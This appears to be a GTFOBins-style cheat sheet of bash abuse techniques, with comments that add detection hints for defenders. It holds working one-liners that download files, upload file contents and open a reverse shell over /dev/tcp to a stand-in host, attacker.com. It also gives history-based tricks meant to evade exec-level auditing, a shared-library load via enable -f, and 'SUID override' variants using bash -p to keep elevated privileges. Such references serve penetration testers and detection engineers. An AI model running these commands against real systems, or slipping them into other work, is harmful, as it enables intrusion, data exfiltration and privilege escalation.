bash
Download
# Download over a raw TCP socket using bash's built-in /dev/tcp/<host>/<port>
# pseudo-file: fd 3 is opened read/write (3<>), a hand-built HTTP/1.0 GET is
# written to it, and the reply is consumed until the bare "\r" line that ends
# the headers; what follows (the body) is written to the output file.
# No curl/wget is spawned, so the signal for a defender is outbound network
# traffic originating from a plain `bash` process.
bash -c '{ echo -ne "GET /path/to/input-file HTTP/1.0\r\nhost: attacker.com\r\n\r\n" 1>&3; cat 0<&3; } \
3<>/dev/tcp/attacker.com/12345 \
| { while read -r; do [ "$REPLY" = "$(echo -ne "\r")" ] && break; done; cat; } >/path/to/output-file'
SUID override:
# Same HTTP/1.0 download over /dev/tcp, started with -p (privileged mode):
# bash then does not reset an effective UID that differs from the real UID,
# so if the binary is setuid the output file is written with the elevated
# effective UID. `bash -p` in process-creation telemetry is worth alerting on.
bash -p -c '{ echo -ne "GET /path/to/input-file HTTP/1.0\r\nhost: attacker.com\r\n\r\n" 1>&3; cat 0<&3; } \
3<>/dev/tcp/attacker.com/12345 \
| { while read -r; do [ "$REPLY" = "$(echo -ne "\r")" ] && break; done; cat; } >/path/to/output-file'
# Download without any HTTP framing: $(</dev/tcp/...) is bash's
# redirection-as-command-substitution, which reads from the socket until the
# peer closes it; the data is then echoed into the output file.
bash -c 'echo "$(</dev/tcp/attacker.com/12345) >/path/to/output-file'
SUID override:
# Framing-less /dev/tcp download run with -p, so a setuid bash keeps its
# effective UID when writing the output file.
bash -p -c 'echo "$(</dev/tcp/attacker.com/12345) >/path/to/output-file'
File Read
# File read: $(</path) is bash's builtin equivalent of $(cat /path), so the
# file is read without executing any external program — exec-based auditing
# sees only the bash invocation itself.
bash -c 'echo "$(</path/to/input-file)"'
SUID override:
# Builtin file read with -p: on a setuid bash the file is opened with the
# retained effective UID rather than the caller's real UID.
bash -p -c 'echo "$(</path/to/input-file)"'
This only works from an existing interactive `bash` session.
# File read through the history mechanism (interactive session only): the
# in-memory history is emptied (history -c), the target file is loaded as if
# it were a history file (history -r), and then listed (history).
# HISTTIMEFORMAT is set to a carriage return plus the ANSI erase-line sequence
# ($'\r\e[K'); when `history` prints each entry the cursor returns to column 0
# and the entry number is erased, so the terminal shows the file's lines on
# their own. No file-reading command is executed, which is why this evades
# exec-level controls.
HISTTIMEFORMAT=$'\r\e[K'
history -c
history -r /path/to/input-file
history
File Write
# File write via plain shell redirection; DATA stands for the content.
bash -c 'echo DATA >/path/to/output-file'
SUID override:
# Redirection-based file write with -p, so a setuid bash creates/overwrites
# the output file with its retained effective UID.
bash -p -c 'echo DATA >/path/to/output-file'
This only works from an existing interactive `bash` session. It adds timestamps to the output file.
# File write through the history file (interactive session only): HISTIGNORE
# keeps the `history *` commands themselves out of the list, history -c
# empties it, DATA is typed at the prompt (it need not be a valid command) so
# it becomes the only entry, and history -w writes the list to the output
# file. Because timestamps are enabled, each entry is preceded by a timestamp
# line in the written file.
HISTIGNORE='history *'
history -c
DATA
history -w /path/to/output-file
Library Load
# Library load: `enable -f` loads a shared object into the running bash
# process as a new builtin (named x here), i.e. arbitrary native code runs
# inside bash without a separate exec. `enable -f` in command-line auditing
# is a strong indicator.
bash -c 'enable -f /path/to/lib.so x'
SUID override:
# Shared-object load via `enable -f` under -p: the loaded code runs with the
# effective UID a setuid bash retains.
bash -p -c 'enable -f /path/to/lib.so x'
Reverse Shell
# Reverse shell: exec replaces the process with an interactive bash whose
# stdout and stderr (&>) are redirected to a /dev/tcp socket and whose stdin
# is duplicated from fd 1 (<&1), i.e. the same socket. An interactive bash
# whose standard descriptors are sockets is the thing to detect.
bash -c 'exec bash -i &>/dev/tcp/attacker.com/12345 <&1'
SUID override:
# Reverse shell with -p passed to both the outer bash and the exec'd
# interactive bash, so a setuid effective UID survives the exec.
bash -p -c 'exec bash -p -i &>/dev/tcp/attacker.com/12345 <&1'
Shell
# Shell: an ordinary interactive bash.
bash
SUID override:
# Shell in privileged mode: -p stops bash from resetting the effective UID to
# the real UID, which is what a setuid copy of bash would otherwise do at
# startup. Setuid bash binaries should not exist; audit for them.
bash -p
Upload
# Upload: the file is read with the builtin $(<...) and sent through a
# /dev/tcp socket (created by the output redirection) wrapped in a minimal
# HTTP/0.9-style POST; echo -e turns the \n escapes into real newlines.
bash -c 'echo -e "POST / HTTP/0.9\n\n$(</path/to/input-file)" >/dev/tcp/attacker.com/12345'
SUID override:
# HTTP-framed /dev/tcp upload under -p, so the input file is read with the
# effective UID a setuid bash retains.
bash -p -c 'echo -e "POST / HTTP/0.9\n\n$(</path/to/input-file)" >/dev/tcp/attacker.com/12345'
# Upload without framing: the raw file contents (no trailing newline, -n) are
# written straight to a /dev/tcp socket.
bash -c 'echo -n "$(</path/to/input-file)" >/dev/tcp/attacker.com/12345'
SUID override:
# Raw /dev/tcp upload under -p, reading the input file with the effective UID
# a setuid bash retains.
bash -p -c 'echo -n "$(</path/to/input-file)" >/dev/tcp/attacker.com/12345'